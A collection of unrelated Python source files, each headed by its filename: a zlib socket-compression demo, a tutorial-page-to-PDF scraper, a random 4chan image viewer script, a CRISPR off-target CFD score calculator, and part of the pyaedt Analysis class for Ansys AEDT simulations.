# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#__version__ = "$Id$"
#end_pymotw_header
import zlib
import logging
import SocketServer
import binascii
BLOCK_SIZE = 64
class ZlibRequestHandler(SocketServer.BaseRequestHandler):
logger = logging.getLogger('Server')
def handle(self):
compressor = zlib.compressobj(1)
# Find out what file the client wants
filename = self.request.recv(1024)
self.logger.debug('client asked for: "%s"', filename)
# Send chunks of the file as they are compressed
with open(filename, 'rb') as input:
while True:
block = input.read(BLOCK_SIZE)
if not block:
break
self.logger.debug('RAW "%s"', block)
compressed = compressor.compress(block)
if compressed: # 凑齐输出压缩块
self.logger.debug('SENDING "%s"',
binascii.hexlify(compressed))
self.request.send(compressed)
else:
self.logger.debug('BUFFERING')
# Send any data being buffered by the compressor
remaining = compressor.flush()
while remaining:
to_send = remaining[:BLOCK_SIZE]
remaining = remaining[BLOCK_SIZE:]
self.logger.debug('FLUSHING "%s"',
binascii.hexlify(to_send))
self.request.send(to_send)
return
if __name__ == '__main__':
import socket
import threading
from cStringIO import StringIO
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger('Client')
# Set up a server, running in a separate thread
address = ('localhost', 0) # let the kernel assign a port ?
server = SocketServer.TCPServer(address, ZlibRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
# Connect to the server as a client
logger.info('Contacting server on %s:%s', ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Ask for a file
requested_file = 'lorem.txt'
logger.debug('sending filename: "%s"', requested_file)
len_sent = s.send(requested_file)
# Receive a response
buffer = StringIO()
decompressor = zlib.decompressobj()
while True:
response = s.recv(BLOCK_SIZE)
if not response:
break
logger.debug('READ "%s"', binascii.hexlify(response))
# Include any unconsumed data when feeding the decompressor.
# 关键是这里!
to_decompress = decompressor.unconsumed_tail + response
while to_decompress:
decompressed = decompressor.decompress(to_decompress)
if decompressed:
logger.debug('DECOMPRESSED "%s"', decompressed)
buffer.write(decompressed)
# Look for unconsumed data due to buffer overflow
# 剩余的待解压数据
to_decompress = decompressor.unconsumed_tail
# 没凑齐输出解压块呢
else:
logger.debug('BUFFERING')
to_decompress = None
# deal with data reamining inside the decompressor buffer
remainder = decompressor.flush()
if remainder:
logger.debug('FLUSHED "%s"', remainder)
buffer.write(reaminder)
full_response = buffer.getvalue()
lorem = open('lorem.txt', 'rt').read()
logger.debug('response matches file contents: %s',
full_response == lorem)
# Clean up
s.close()
server.socket.close()
|
main.py
|
from urllib import request
from bs4 import BeautifulSoup
from multiprocessing import Process
from collections import deque
import json
import os
import sys
import pdfkit
import subprocess
import platform
import re
import time
def getPDF(filename = 'out'):
def _get_pdfkit_config():
"""wkhtmltopdf lives and functions differently depending on Windows or Linux. We
need to support both since we develop on windows but deploy on Heroku.
Returns: A pdfkit configuration"""
if platform.system() == 'Windows':
return pdfkit.configuration(wkhtmltopdf=os.environ.get('WKHTMLTOPDF_BINARY', 'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'))
else:
WKHTMLTOPDF_CMD = subprocess.Popen(['which', os.environ.get('WKHTMLTOPDF_BINARY', 'wkhtmltopdf')], stdout=subprocess.PIPE).communicate()[0].strip()
return pdfkit.configuration(wkhtmltopdf=WKHTMLTOPDF_CMD)
try:
if 'DYNO' in os.environ:
print ('loading wkhtmltopdf path on heroku')
WKHTMLTOPDF_CMD = subprocess.Popen(
['which', os.environ.get('WKHTMLTOPDF_BINARY', 'wkhtmltopdf-pack')], # Note we default to 'wkhtmltopdf' as the binary name
stdout=subprocess.PIPE).communicate()[0].strip()
print("DYNO")
pdfkit.from_file(filename + '.html', filename + '.pdf', configuration=_get_pdfkit_config())
else:
print ('loading wkhtmltopdf path on localhost')
MYDIR = os.path.dirname(__file__)
WKHTMLTOPDF_CMD = os.path.join(MYDIR + "/static/executables/bin/", "wkhtmltopdf.exe")
pdfkit.from_file(filename + '.html', filename + '.pdf', configuration=_get_pdfkit_config())
except Exception as e:
print("Empty File Possible" + str(e))
class TPExtractor:
def __init__(self, argsList):
self.start = '<!-- Tutorial Content Starts Here -->'
self.end = '<!-- Tutorial Content Ends Here -->'
self.domain = 'https://www.tutorialspoint.com'
self.url = str(argsList[1])
self.iters = int(argsList[2]) if len(argsList) > 2 else 1
self.outFile = str(argsList[3]) if len(argsList) > 3 else 'out'
outFile = self.outFile
for i in ['.html', '.pdf']:
if os.path.exists(outFile + i):
os.remove(outFile + i)
for file in os.scandir('.'):
if file.name.endswith(".html") or file.name.endswith(".pdf"):
os.unlink(file.path)
def getNext(self, content):
try:
soup = BeautifulSoup(content, 'html.parser')
outerdiv = soup.find_all("div", attrs = {"id":"bottom_navigation"})
innerdiv = [iter.find('div', attrs = {"class" : "nxt-btn"} ) for iter in outerdiv]
nextURL = [iter.find('a')["href"] for iter in innerdiv]
return nextURL[-1]
except Exception as E:
print(E)
return False
def absoluteLinks(self, content, domain):
soup = BeautifulSoup(content, 'html.parser')
for hyperlink in soup.find_all(href=True):
try:
request.urlopen(hyperlink["href"])
except :
hyperlink["href"] = domain + hyperlink["href"]
for hyperlink in soup.find_all(src=True):
try:
request.urlopen(hyperlink["src"])
except :
hyperlink["src"] = domain + hyperlink["src"]
return str(soup)
def addToHTML(self, URL, iterations = 1, filename = 'out'):
print(str(iterations) + " pages to go . . .")
if iterations < 1:
return getPDF(filename)
req = request.urlopen(URL)
html = req.read().decode('utf-8')
content = html.split(self.start)[1].split(self.end)[0]
content = self.absoluteLinks(content, self.domain)
htmlFilename = filename + '.html'
if os.path.exists(htmlFilename):
fileOption = 'a'
else:
fileOption = 'w'
f = open(htmlFilename, fileOption)
f.write(content + '<hr><hr>')
f.close()
nextURL = self.getNext(content)
if not nextURL:
self.addToHTML(URL, iterations = 0, filename = filename)
else:
self.addToHTML(nextURL, iterations = iterations - 1, filename = filename)
def main(self):
self.addToHTML(self.url, self.iters, self.outFile)
class Generic:
def __init__(self, argsList):
self.url = str(argsList[1])
self.iters = int(argsList[2]) if len(argsList) > 2 else 1
self.outFile = str(argsList[3]) if len(argsList) > 3 else 'out'
outFile = self.outFile
self.ob = TPExtractor(argsList)
self.domain = str(self.url.split("//")[-1].split("/")[0].split('?')[0])
print(self.domain)
self.regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
self.nextRe = re.compile(r'.*(next|nxt).*', re.IGNORECASE)
def getNext(self, content):
try:
soup = BeautifulSoup(content, 'html.parser')
# parsed = soup.prettify()
# parsed = parsed.split('\n')
# print(parsed)
# for line in parsed:
# if 'href' in line:
# # print(line)
# continue
ret = deque([])
retP = deque([])
for l in soup.find_all(href=True):
if self.nextRe.match(str(l)) and ( 'class' in str(l) or 'id' in str(l)):
ret.appendleft(str(l["href"]))
elif self.nextRe.match(str(l.parent)) and ( 'class' in str(l.parent) or 'id' in str(l.parent)):
retP.appendleft(str(l["href"]))
if ret:
return ret[0]
if retP:
return ret[0]
print(ret, retP)
return False
except Exception as E:
print(E)
return False
def getAbsolute(self, content, domain):
soup = BeautifulSoup(content, 'html.parser')
for hyperlink in soup.find_all(href=True):
if str(hyperlink["href"]).startswith('/'):
hyperlink["href"] = str(domain) + hyperlink["href"]
elif str(hyperlink["href"]).startswith('./'):
hyperlink["href"] = str(domain) + hyperlink["href"][1:]
elif not self.regex.match(hyperlink["href"]):
hyperlink["href"] = 'http://' + str(domain) + '/' + hyperlink["href"]
for hyperlink in soup.find_all(src=True):
if str(hyperlink["src"]).startswith('/'):
hyperlink["src"] = str(domain) + hyperlink["src"]
elif str(hyperlink["src"]).startswith('./'):
hyperlink["src"] = str(domain) + hyperlink["src"][1:]
elif not self.regex.match(hyperlink["src"]):
hyperlink["src"] = 'http://' + str(domain) + '/' + hyperlink["src"]
return str(soup)
def util(self, URL, iterations = 1, filename = 'out'):
print(str(iterations) + " pages to go . . .")
if iterations < 1:
action_process = Process(target=lambda : getPDF(filename))
action_process.start()
action_process.join(timeout=15)
action_process.terminate()
return None
req = request.urlopen(URL)
html = req.read().decode('utf-8')
domain = self.domain
content = str(self.getAbsolute(html, domain))
htmlFilename = filename + '.html'
if os.path.exists(htmlFilename):
fileOption = 'a'
else:
fileOption = 'w'
f = open(htmlFilename, fileOption)
f.write(content + '<hr><hr>')
f.close()
print('.')
nextURL = self.getNext(content)
print(nextURL)
if not nextURL:
self.util(URL, iterations = 0, filename = filename)
else:
self.util(nextURL, iterations = iterations - 1, filename = filename)
def main(self):
self.util(self.url, self.iters, self.outFile)
# TEST
if __name__ == '__main__':
argsList = sys.argv
# TPExtractor(argsList).main()
# Generic(argsList).main()
# getPDF('out')
|
4chanlurker.py
|
#!/usr/bin/python3
# Released under apache license 2.0, no warranties
# included in this software and it's not meant for
# any production purpose. I decline any responsibility
# copyright 2016 Raffaele Di Campli
from postsifter import PostSifter, Post
import logging
import sys
import subprocess
import time
import threading
import json
if __name__ == "__main__":
logger = logging.getLogger()
logger.setLevel(logging.INFO)
config = []
with open("conf.json") as configFile:
config = json.load(configFile)
config["boards"] = config["boards"].split(" ")
config["command"] = config["command"].split(" ")
logging.debug("main: {}".format(config))
sifter = PostSifter(config)
post = sifter.get_random_post()
logging.debug("main: {}".format(config["command"]))
p = subprocess.Popen(config["command"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
#must use multithreading because subprocess.communicate() is blocking
thr = threading.Thread(target=p.communicate, args=(post.image,))
thr.start()
logging.debug("main: i'm going to sleep")
time.sleep(config["delay"])
p.terminate()
thr.join()
|
cfd-score-calculator.py
|
#Calculates the Cutting Frequency Determination score
#Requirements: 1. Pickle file with mismatch scores in working directory
# 2. Pickle file containing PAM scores in working directory
#Input: 1. 23mer WT sgRNA sequence
# 2. 23mer Off-target sgRNA sequence
#Output: CFD score
import pickle
import argparse
import re
import numpy as np
import os
from multiprocessing import Process, Manager
NUM_CORES = 16
# Did small experiment on Jan 11
# PAM does not matter - good!
# so we'll just use a TGG
APP_STATIC = "/home/joshm/GUIDES/CRISPR-Library-Designer/static"
exome_path_hum = os.path.join(APP_STATIC, 'data', 'exome_hum_ccds.txt')
mer_len = 20
def get_parser():
parser = argparse.ArgumentParser(description='Calculates CFD score')
parser.add_argument('--wt',
type=str,
help='WT 23mer sgRNA sequence')
parser.add_argument('--off',
type=str,
help='Off-target 23mer sgRNA sequence')
return parser
#Reverse complements a given string
def revcom(s):
basecomp = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A','U':'A'}
letters = list(s[::-1])
letters = [basecomp[base] for base in letters]
return ''.join(letters)
#Unpickle mismatch scores and PAM scores
def get_mm_pam_scores():
try:
mm_scores = pickle.load(open('mismatch_score.pkl','rb'))
pam_scores = pickle.load(open('pam_scores.pkl','rb'))
return (mm_scores,pam_scores)
except:
raise Exception("Could not find file with mismatch scores or PAM scores")
#Calculates CFD score
def calc_cfd(wt,sg,pam):
mm_scores,pam_scores = get_mm_pam_scores()
score = 1
sg = sg.replace('T','U')
wt = wt.replace('T','U')
s_list = list(sg)
wt_list = list(wt)
for i,sl in enumerate(s_list):
if wt_list[i] == sl:
score*=1
else:
key = 'r'+wt_list[i]+':d'+revcom(sl)+','+str(i+1)
score*= mm_scores[key]
score*=pam_scores[pam]
return (score)
def get_pot_off_targets(seq):
seq_list = list(seq)
backup_seq_list = list(seq)
nts = ['A','T','C','G']
results = {}
for a in range(len(seq)):
for a_sym in nts:
seq_list[a] = a_sym
for b in range(a + 1, len(seq)):
for b_sym in nts:
seq_list[b] = b_sym
for c in range(b + 1, len(seq)):
for c_sym in nts:
seq_list[c] = c_sym
new_seq = ''.join(seq_list)
results[new_seq] = True
seq_list[c] = backup_seq_list[c]
seq_list[b] = backup_seq_list[b]
seq_list[a] = backup_seq_list[a]
if seq in results:
del results[seq]
return results.keys()
# parallel process container
manager = Manager()
off_target_scores = manager.dict()
# generate all 21-mers followed by GG
print "preparing hum kmers"
with open(exome_path_hum, 'r') as input:
exome = input.read()
exome_mers = {}
for i in range(len(exome) - mer_len - 3):
s = exome[i:i + mer_len]
if exome[i + mer_len + 1 : i + mer_len + 3] != "GG": # only PAMs
continue
if '=' in s or 'N' in s:
continue
if s in off_target_scores:
off_target_scores[s] = 'inf'
continue
off_target_scores[s] = 0
if s in exome_mers:
exome_mers[s] += 1
else:
exome_mers[s] = 1
# Parallelize
def process_core(pid, results, protospacers):
i = 0
for protospacer in protospacers:
i += 1
if i % 10000 == 0: print i, 'pid = ', pid
score = 0
off_targets = get_pot_off_targets(protospacer)
for off_target in off_targets:
if off_target in exome_mers:
wt = protospacer + "CGG"
sg = off_target
pam = "GG"
score += exome_mers[off_target] * calc_cfd(wt, sg, pam)
off_target_scores[protospacer] = score
# throw onto cores
print 'throwing onto cores'
processes = []
exome_mers_keys = exome_mers.keys()
unit = len(exome_mers_keys) / NUM_CORES + 1
print 'unit is', unit
for i in range(NUM_CORES):
start = unit * i
end = min(unit * (i + 1), len(exome_mers_keys))
protospacers = exome_mers_keys[start:end]
p = Process(target = process_core, args=(i, off_target_scores, protospacers,))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print 'writing results'
if __name__ == '__main__':
with open("off_target_scores.p", "wb") as output:
pickle.dump(dict(off_target_scores), output)
print 'done'
|
Analysis.py
|
"""
This module contains the ``analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name
from pyaedt.generic.constants import (
AXIS,
PLANE,
GRAVITY,
VIEW,
SOLUTIONS,
SETUPS,
CoordinateSystemPlane,
CoordinateSystemAxis,
Plane,
GravityDirection,
)
from pyaedt.modules.Boundary import NativeComponentObject
from pyaedt.modules.DesignXPloration import (
DOESetups,
DXSetups,
OptimizationSetups,
ParametericsSetups,
SensitivitySetups,
StatisticalSetups,
)
from pyaedt.modules.MaterialLib import Materials
from pyaedt.modules.SolveSetup import Setup
from pyaedt.application.Design import Design
from pyaedt.application.JobManager import update_hpc_option
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited in the caller application and is accessible through it ( eg. ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
NG : bool
Whether to run AEDT in the non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self.solution_type = solution_type
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._available_variations = self.AvailableVariations(self)
if "HFSS 3D Layout Design" in self.design_type:
self._oanalysis = self._odesign.GetModule("SolveSetups")
elif "EMIT" in self.design_type or "Maxwell Circuit" in self.design_type:
self._oanalysis = None
elif "Circuit Design" in self.design_type or "Twin Builder" in self.design_type:
self._oanalysis = self._odesign.GetModule("SimSetup")
else:
self._oanalysis = self._odesign.GetModule("AnalysisSetup")
if self.design_type != "Maxwell Circuit":
self._ooptimetrics = self._odesign.GetModule("Optimetrics")
self._ooutput_variable = self._odesign.GetModule("OutputVariable")
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.opti_parametric = ParametericsSetups(self)
self.opti_optimization = OptimizationSetups(self)
self.opti_doe = DOESetups(self)
self.opti_designxplorer = DXSetups(self)
self.opti_sensitivity = SensitivitySetups(self)
self.opti_statistical = StatisticalSetups(self)
self.native_components = self._get_native_data()
self.SOLUTIONS = SOLUTIONS()
self.SETUPS = SETUPS()
self.AXIS = AXIS()
self.PLANE = PLANE()
self.VIEW = VIEW()
self.GRAVITY = GRAVITY()
@property
def ooptimetrics(self):
"""Optimetrics AEDT Module.
References
----------
>>> oDesign.GetModule("Optimetrics")
"""
return self._ooptimetrics
@property
def ooutput_variable(self):
"""Output Variable AEDT Module.
References
----------
>>> oDesign.GetModule("OutputVariable")
"""
return self._ooutput_variable
@property
def oanalysis(self):
"""Analysis AEDT Module.
References
----------
>>> oDesign.GetModule("SolveSetups")
>>> oDesign.GetModule("SimSetup")
>>> oDesign.GetModule("AnalysisSetup")
"""
return self._oanalysis
@property
def output_variables(self):
"""List of Output variables.
Returns
-------
list of str
References
----------
>>> oModule.GetOutputVariables()
"""
return self.ooutput_variable.GetOutputVariables()
@property
def materials(self):
"""Manages materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Manages materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
.. deprecated:: 0.4.8
Use :attr:`AXIS` instead.
Returns
-------
:class:`pyaedt.modeler.constants.AXIS`
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
.. deprecated:: 0.4.8
Use :attr:`PLANE` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes.
.. deprecated:: 0.4.8
Use :attr:`VIEW` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction.
.. deprecated:: 0.4.8
Use :attr:`GRAVITY` instead.
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.AdvancedPostProcessing.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
References
----------
>>> oModule.GetAllSolutionSetups()
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
self._setup = setup_list[0]
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list of str
List of all analysis sweeps in the design.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweeps = self.oanalysis.GelAllSolutionNames()
else:
setuptype = self.design_solutions.default_adaptive
if setuptype:
sweep_list.append(el + " : " + setuptype)
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the last adaptive sweep if a sweep is available or
the name of the nominal adaptive sweep if present.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list of str
List of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def setup_names(self):
"""Setup names.
Returns
-------
list of str
List of names of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
return self.oanalysis.GetSetups()
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SETUPS
List of all simulation setup types categorized by application.
"""
return SETUPS()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SOLUTIONS
List of all solution type categorized by application.
"""
return SOLUTIONS()
@aedt_exception_handler
def get_excitations_name(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
try:
list_names = list(self.oboundary.GetExcitations())
del list_names[1::2]
return list_names
except:
return []
@aedt_exception_handler
def analyze_all(self):
"""Analyze all setup in an actual design.
Returns
-------
bool
``True`` when simulation is finished.
"""
self.odesign.AnalyzeAll()
return True
@aedt_exception_handler
def list_of_variations(self, setup_name=None, sweep_name=None):
"""Return list of active variation for input setup.
Parameters
----------
setup_name : str, optional
Setup name. If ``None`` nominal adaptive will be used.
sweep_name : str, optional
Sweep name. If ``None`` nominal adaptive will be used.
Returns
-------
list
References
----------
>>> oModule.ListVariations
"""
if not setup_name and ":" in self.nominal_sweep:
setup_name = self.nominal_adaptive.split(":")[0].strip()
elif not setup_name:
self.logger.warning("No Setup defined.")
return False
if not sweep_name and ":" in self.nominal_sweep:
sweep_name = self.nominal_adaptive.split(":")[1].strip()
elif not sweep_name:
self.logger.warning("No Sweep defined.")
return False
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
try:
return list(self.osolution.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
else:
try:
return list(self.odesign.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
@aedt_exception_handler
def export_results(self, analyze=False, export_folder=None):
"""Export all available reports to file, including sNp, profile and convergence.
Parameters
----------
analyze : bool
Either to Analyze before export or not. Solutions have to be present for the design.
export_folder : str, optional
Full path to project folder. If `None` working_directory will be used.
Returns
-------
list
List of all exported files.
References
----------
>>> oModule.GetAllPortsList
>>> oDesign.ExportProfile
>>> oModule.ExportToFile
>>> oModule.ExportConvergence
>>> oModule.ExportNetworkData
"""
exported_files = []
if not export_folder:
export_folder = self.working_directory
if analyze:
self.analyze_all()
setups = self.oanalysis.GetSetups()
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
excitations = len(self.oexcitation.GetAllPortsList())
else:
excitations = self.oboundary.GetNumExcitations()
reportnames = self.post.oreportsetup.GetAllReportNames()
for report_name in reportnames:
name_no_space = report_name.replace(" ", "_")
self.post.oreportsetup.UpdateReports([str(report_name)])
export_path = os.path.join(
export_folder, "{0}_{1}_{2}.csv".format(self.project_name, self.design_name, name_no_space)
)
self.post.oreportsetup.ExportToFile(str(report_name), export_path)
self.logger.info("Export Data: {}".format(export_path))
exported_files.append(export_path)
for s in setups:
sweeps = self.oanalysis.GetSweeps(s)
if len(sweeps) == 0:
sweeps = ["LastAdaptive"]
else:
pass
for sweep in sweeps:
variation_array = self.list_of_variations(s, sweep)
if len(variation_array) == 1:
export_path = os.path.join(export_folder, "{}.prof".format(self.project_name))
result = self.export_profile(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{}.conv".format(self.project_name))
result = self.export_convergence(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}.s{1}p".format(self.project_name, excitations)
)
self.osolution.ExportNetworkData(
variation_array[0],
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
else:
varCount = 0
for variation in variation_array:
varCount += 1
export_path = os.path.join(export_folder, "{0}_{1}.prof".format(self.project_name, varCount))
result = self.export_profile(s, variation, export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{0}_{1}.conv".format(self.project_name, varCount))
self.logger.info("Export Convergence: %s", export_path)
result = self.export_convergence(s, variation, export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}_{1}.s{2}p".format(self.project_name, varCount, excitations)
)
self.logger.info("Export SnP: {}".format(export_path))
self.osolution.ExportNetworkData(
variation,
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
return exported_files
@aedt_exception_handler
def export_convergence(self, setup_name, variation_string="", file_path=None):
"""Export a solution convergence to file.
Parameters
----------
setup_name : str
Setup name. Eg ``'Setup1'``
variation_string : str
Variation string with values. Eg ``'radius=3mm'``
file_path : str, optional
full path to .prof file. If `None` working_directory will be used.
Returns
-------
str
File path if created.
References
----------
>>> oModule.ExportConvergence
"""
if not file_path:
file_path = os.path.join(self.working_directory, generate_unique_name("Convergence") + ".prop")
self.odesign.ExportConvergence(setup_name, variation_string, file_path)
self.logger.info("Export Convergence to %s", file_path)
return file_path
@aedt_exception_handler
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and isinstance(data_vals, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if isinstance(ds, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, app):
"""Contains available variations.
Parameters
----------
app :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._app = app
@property
def variables(self):
"""Variables.
Returns
-------
list of str
List of names of independent variables.
"""
return [i for i in self._app.variable_manager.independent_variables]
@aedt_exception_handler
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of lists
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
vs = self._app.osolution.GetAvailableVariations(setup_sweep)
families = []
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@aedt_exception_handler
def get_variation_strings(self, setup_sweep=None):
"""Return variation strings.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of str
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
return self._app.osolution.GetAvailableVariations(setup_sweep)
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = []
if self._app.design_type == "HFSS 3D Layout Design":
if self._app._is_object_oriented_enabled():
listvar = list(self._app._odesign.GetChildObject("Variables").GetChildNames())
else:
listvar = list(self._app._odesign.GetVariables())
for el in listvar:
families.append(el + ":=")
families.append([self._app._odesign.GetVariableValue(el)])
else:
variation = self._app._odesign.GetNominalVariation()
for el in self.variables:
families.append(el + ":=")
families.append([self._app._odesign.GetVariationVariableValue(variation, el)])
return families
@property
def nominal_w_values_dict(self):
